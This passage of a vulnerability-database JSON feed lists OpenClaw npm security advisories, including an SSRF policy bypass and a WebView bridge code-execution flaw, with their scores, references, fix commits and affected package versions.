/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-
5fc7-f62m-8983"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41911","reference_id":"CVE-2026-41911","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41911"},{"reference_url":"https://github.com/advisories/GHSA-5fc7-f62m-8983","reference_id":"GHSA-5fc7-f62m-8983","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5fc7-f62m-8983"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image","reference_id":"openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyh
s"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41911","GHSA-5fc7-f62m-8983"],"risk_score":3.0,"exploitability":"0.5","weighted_severit
y":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mv8b-cryt-u3g8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89740?format=json","vulnerability_id":"VCID-mxu5-yjqs-nuap","summary":"OpenClaw: Existing-session browser interaction routes bypassed SSRF policy enforcement\n## Summary\n\nExisting-session browser interaction routes bypassed SSRF policy enforcement.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nExisting-session browser interaction routes could continue interacting with or navigating targets without applying the same SSRF navigation guard used by guarded browser routes.\n\n## Technical Details\n\nThe fix guards existing-session navigation and interaction routes with browser navigation policy checks.\n\n## Fix\n\nThe issue was fixed in #64370. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `daeb74920d5ad986cb600625180037e23221e93a`\n- PR: #64370\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43573","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43573"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/daeb74920d5ad986cb600625180037e23221e93a"},{"reference_ur
l":"https://github.com/openclaw/openclaw/pull/64370","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64370"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-527m-976r-jf79"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43573","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43573"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes","reference_id":"","reference_type":"","s
cores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-existing-session-browser-interaction-routes"},{"reference_url":"https://github.com/advisories/GHSA-527m-976r-jf79","reference_id":"GHSA-527m-976r-jf79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-527m-976r-jf79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":
"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43573","GHSA-527m-976r-jf79"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mxu5-yjqs-nuap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91810?format=json","vulnerability_id":"VCID-nf6w-v1pc-mbe5","summary":"OpenClaw: Arbitrary code execution via unvalidated WebView JavascriptInterface\n## Summary\nAndroid Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `8b02ef133275be96d8aac2283100016c8a7f32e5`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- 
apps/android/app/src/main/java/ai/openclaw/app/ui/CanvasScreen.kt now snapshots page origin and rejects untrusted bridge calls.\n- apps/android/app/src/main/java/ai/openclaw/app/node/CanvasActionTrust.kt centralizes trusted origin and path validation for the bridge.\n\nOpenClaw thanks @cyjhhh for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35643","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14446","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14485","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14482","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35643"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"
https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35643","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35643"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascripti
nterface","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface"},{"reference_url":"https://github.com/advisories/GHSA-cxmw-p77q-wchg","reference_id":"GHSA-cxmw-p77q-wchg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxmw-p77q-wchg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"V
CID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"V
CID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"V
CID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"v